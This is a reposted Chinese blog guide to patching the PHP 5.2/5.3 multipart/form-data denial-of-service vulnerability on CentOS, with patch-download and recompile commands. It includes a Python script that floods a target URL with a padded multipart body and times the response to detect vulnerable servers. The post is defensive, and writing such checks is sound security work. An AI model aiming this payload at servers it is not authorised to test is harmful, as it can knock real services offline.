form-data php,php打Multipart/form-data漏洞补丁

最新推荐文章于 2022-12-30 17:19:53 发布
最新推荐文章于 2022-12-30 17:19:53 发布
阅读量254 收藏
点赞数
文章标签: form-data php

今天在乌云上看到PHP multipart/form-data 远程DOS漏洞,马上给同事联系了下对线上服务器进行打补丁,先给一个centos编译安装nginx+php-fpm+mysql的教程,如果是根据我这样安装的话,那你们可以继续按照做下去了,如果不是的话,那么你们就看看吧.

系统:centos 5.x(64位)

需要的软件:php-5.2-multipart-form-data.patch

1.查看自己php版本

php -v

PHP 5.2.17p1 (cli) (built: Oct 29 2015 15:31:06)

Copyright (c) 1997-2010 The PHP Group

Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies

如果版本高于5.3的话,那就直接升级php就可以了.

2.下载补丁文件

wget http://soft.vpser.net/web/php/bug/php-5.2-multipart-form-data.patch

wget http://download.slogra.com/php_patch/php-5.2-multipart-form-data.patch

3.安装补丁

5.2:

cp php-5.2-multipart-form-data.patch ~/install/php-5.2.17/

cd php-5.2.17

patch -p1 < php-5.2-multipart-form-data.patch

5.3:

wget http://soft.vpser.net/web/php/bug/php-5.3-multipart-form-data.patch

patch -p1 < php-5.3-multipart-form-data.patch

将42行到45行删除:

if [ “$php_version” == “$old_php_version” ]; then

echo “Error: The upgrade PHP Version is the same as the old Version!!”

exit 1

fi

4.重新对php进行编译

./configure --prefix=/usr/local/php --enable-fastcgi --enable-fpm --with-fpm-log=/var/log/php-fpm.log \

--with-fpm-conf=/etc/php-fpm.conf --with-fpm-pid=/var/run/php-fpm.pid --with-config-file-path=/etc \

--with-config-file-scan-dir=/etc/php.d --with-openssl --with-zlib --enable-bcmath --with-bz2 --with-curl \

--enable-ftp --with-gd --enable-gd-native-ttf --with-jpeg-dir --with-png-dir --with-gettext --with-mhash \

--enable-mbstring --with-mcrypt --enable-soap --enable-zip --with-iconv=/usr/local/libiconv \

--with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysql_config --without-pear

PS:你们最好自己查看下自己php的编译参数,php -i|grep configure

make && make install

好了,这样就把漏洞整好了,怎么检测呢?请看下面这个脚本:

cat dd.py

'''

Author: Shusheng Liu,The Department of Security Cloud, Baidu

email: liusscs@163.com

'''

import sys

import urllib,urllib2

import datetime

from optparse import OptionParser

def http_proxy(proxy_url):

proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})

null_proxy_handler = urllib2.ProxyHandler({})

opener = urllib2.build_opener(proxy_handler)

urllib2.install_opener(opener)

#end http_proxy

def check_php_multipartform_dos(url,post_body,headers):

req = urllib2.Request(url)

for key in headers.keys():

req.add_header(key,headers[key])

starttime = datetime.datetime.now();

fd = urllib2.urlopen(req,post_body)

html = fd.read()

endtime = datetime.datetime.now()

usetime=(endtime - starttime).seconds

if(usetime > 5):

result = url+" is vulnerable";

else:

if(usetime > 3):

result = "need to check normal respond time"

return [result,usetime]

#end

def main():

#http_proxy("http://127.0.0.1:8089")

parser = OptionParser()

parser.add_option("-t", "--target", action="store",

dest="target",

default=False,

type="string",

help="test target")

(options, args) = parser.parse_args()

if(options.target):

target = options.target

else:

return;

Num=650000

headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',

'Accept-Encoding':'gzip, deflate',

'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}

body = "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"

payload=""

for i in range(0,Num):

payload = payload + "a\n"

body = body + payload;

body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--"

print "starting...";

respond=check_php_multipartform_dos(target,body,headers)

print "Result : "

print respond[0]

print "Respond time : "+str(respond[1]) + " seconds";

if __name__=="__main__":

main()

本脚本用来检测的,如果拿去做坏事的话,跟本站无关.

夜空- 本站版权

1、本站所有主题由该文章作者发表,该文章作者与夜空享有文章相关版权

2、其他单位或个人使用、转载或引用本文时必须同时征得该文章作者和夜空的同意

3、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责

4、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意

5、原文链接:blog.slogra.com/post-615.html

post-615.html

红烧肉数分
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php http form的格式,multipart/form-data 格式的http请求,以及lua构造实现
weixin_30725317的博客
03-10 1332
大多数前端工程师对于这个multipart/form-data并不陌生,当我们需要发送二进制数据如图片时,通常会用到这个玩意儿~我们用form表单提交数据时,会指定form元素的enctype属性值为multipart/form-data,又或者使用html5新对象Formdata,我们用ajax发送数据时会指定content-type为multipart/form-data.multipart/...
form-data php,PHP中以multipart/form-data上传文件流
weixin_36413546的博客
03-09 859
class UploadPart{protected static $url;protected static $delimiter;protected static $instance;public function __construct() {static::$url = ‘http://files.note.so/v1/file_server‘;static::$delimiter = u...
form-data php,phpmultipart/form-data方式Post提交数据
weixin_29903713的博客
03-09 2298
post的curl库,模拟post提交的时候,默认的方式multipart/form-data ,这个算是post提交的几个基础的实现方式。$postUrl = '';$postData = array('user_name'=>$userName,'identity_no'=>$idCardNo);$curl = curl_init();curl_setopt($curl, CUR...
form-data php,PHP 模拟form-data上传文件
weixin_35510761的博客
03-09 1283
1、需求:a、用php代码实现form-data方式请求接口上传文件2、php代码$filePath = $path."/aa.txt"; //需要上传的文件路径$uploadFileName = "upload.txt"; //上传的文件名,可以自己命名也可以不要$uploadUrl = "www.baidu.com/upload/file"; //上传接口地址$fileData = ...
PHP接收数据
WXY_Y的博客
10-29 1280
首先备注一下GET和POST提交方式的一些简单区别 1、post发送的数据更大(get有url长度限制) 2、post能发送更多的数据类型(get只能发送ASCII字符) 3、post比get慢 4、http协议并未规定get和post的长度限制,get的最大长度限制是因为浏览器和web服务器限制了URL的长度,不同的浏览器和web服务器,限制的最大长度不一样 1、multipart/form-data mult...
C#使用multipart/form-data示例
12-27
在提供的压缩包文件"C#_multipartform_data示例"中,可能包含了这样的示例代码,我们可以从中学习如何在C#环境中实现文件上传或其他多部分数据传输。 通过理解以上知识点和查看示例代码,我们可以深入理解`...
python处理multipart/form-data的请求方法
09-19
本文将详细介绍如何使用Python的requests库处理multipart/form-data类型的请求。 首先,multipart/form-data通常用于POST请求,特别是当需要提交二进制数据,如图片、文档等文件时。在HTTP请求中,它会将数据分割成...
用C语言编写multipart/form-data实现上传文件
02-26
本话题聚焦于使用C语言实现一个不依赖于curl等外部库的multipart/form-data文件上传功能。multipart/form-data是一种HTTP协议中用于处理多部分数据的格式,通常用于上传文件。 在C语言中实现这个功能需要理解HTTP...
浅析application/x-www-form-urlencoded和multipart/form-data的区别
10-25
在Web开发中,当涉及到通过HTTP协议向服务器发送POST请求时,我们经常需要选择不同的数据编码类型,主要是`application/x-www-form-urlencoded`和`multipart/form-data`。这两种编码方式各有其适用场景,主要取决于...
java map转Multipart/form-data类型body实例
08-19
主要介绍了java map转Multipart/form-data类型body实例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
PHP---表单传值
gaoqiandr的博客
12-30 1709
表单传值就是浏览器通过表单元素将用户的选择或者输入的数据提交给后台服务器那我们就为什么要使用它呢?动态网站的特点就是后台根据用户的需求定制数据,所谓的需求就是用户通过当前的选择或者输入的数据信息,表单就是这些数据的承载者。
php post 编码,php curl POST 编码方式 multipart/form-data与application/x-www-form-urlencode的区别...
weixin_39992957的博客
03-17 626
背景CURL在 a.php 中以 POST方式向 b.php 提交数据,但b.php无法接收到数据,而 CURL 操作显示成功。原来,"传递一个数组到CURLOPT_POSTFIELDS,CURL会把数据编码成 multipart/form-data,而传递一个URL-encoded字符串时,数据会被编码成 application/x-www-form-urlencoded"。但是在使用PHP C...
PHP中以multipart/form-data上传文件流
cigaogu2521的博客
06-17 4481
上传封装类 class UploadPart { protected static $url; protected static $delimiter; protected static $instance; public function __cons...
安装zend   注 phpinfo()调不出来解决办法
weixin_33701294的博客
11-01 324
5.5 安装zend tar -zxvf ZendOptimizer-3.0.0-linux-glibc23- x86_64.tar.gz cd ZendOptimizer-3.0.0-linux-glibc23-x86_64 ./install 5.6 安装phpmyadmin cp -rf phpMyAdmin-v2.11.5.2 /usr/local/...
php模拟form-data文件流上传
weixin_43046729的博客
09-26 994
近期接到一个需求需要给对方回传文件,结果对方接受文件的参数有N个都是一个参数名称,我用postman尝试人家确实可以接受到,众所周知用php上传文件封装数据参数名称是具有唯一性的所以最后选择用data文件流的方式去上传构建,下面代码附上希望对你们有所帮助 /** * curl发送数据流 */ public function PostCurl($url,$data){ $curl = curl_init($url); curl_setopt(
form-data php,PHP使用HTML5 FormData对象提交表单操作示例
weixin_32040059的博客
03-09 259
本文实例讲述了PHP使用HTML5 FormData对象提交表单操作。分享给大家供大家参考,具体如下:这是HTML5中新增的一个Api,他能以表单对象作为参数,自动的把表单的数据打包,当ajax发送数据时,发送这个FormData对象,以达到发送表单数据的目的。创建:参数是一个form节点对象var fm = document.getElementById('formid');var fd = n...
php处理formdata,使用PHP手动解析原始的multipart / form-data数据
weixin_39870199的博客
03-10 590
小编典典编辑-请先阅读:此答案在7年后仍然很受欢迎。从那时起,我就再也没有使用过此代码,并且不知道这些天是否有更好的方法。请查看下面的注释,并了解在许多情况下此代码将无法工作。使用风险自负。-好的,因此,根据Dave和Everts的建议,我决定手动解析原始请求数据。经过大约一天的搜索,我没有找到其他方法来执行此操作。我没有像在引用线程中那样篡改原始数据,因为那样会破坏正在上传的文件。这就是正则表达...
如何给php补丁,CSS_教你快速掌握如何使用“Opatch”打补丁,在实际的工作和学习中,很多 - phpStudy...
weixin_32073733的博客
03-28 333
教你快速掌握如何使用“Opatch”打补丁在实际的工作和学习中,很多人都会发现有些Patch没有setup安装程序,本文中我们将详细的介绍如何使用Oracle的opatch工具来进行安装。1、下载Opatch的最新版本可以从Metalink下载,参考 Note:224346.1(Opatch - Where Can I Find the Latest Version of Opatch?)2、准备...
php curl from-data,PHP的curl有三种请求数据的方式你需要知道raw、form-data、x-www-form-urlencoded-Go语言中文社区...
weixin_29144945的博客
03-22 1799
PHP提供的curl是非常常用的功能,估计很多小伙伴还没有研究透HTTP协议就可以傻瓜式的使用了,今天不会学习HTTP的知识,而是要分享一个关于curl开发的细节,就是HTTP请求头协议中的 Content-Type 字段在PHP的curl中的使用。我会在另一篇文章中分享HTTP协议相关知识。我们在使用PHP进行开发过程中,会经常对接别人的接口,尤其是当下互联互通的大趋势下,使用curl的场景会更...
application/x-www-form-urlencoded multipart/form-data 分别举例
最新发布
07-28
Content-Type: multipart/form-data; boundary=---------------------------1234567890 -----------------------------1234567890 Content-Disposition: form-data; name="file"; filename="example.jpg" Content-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值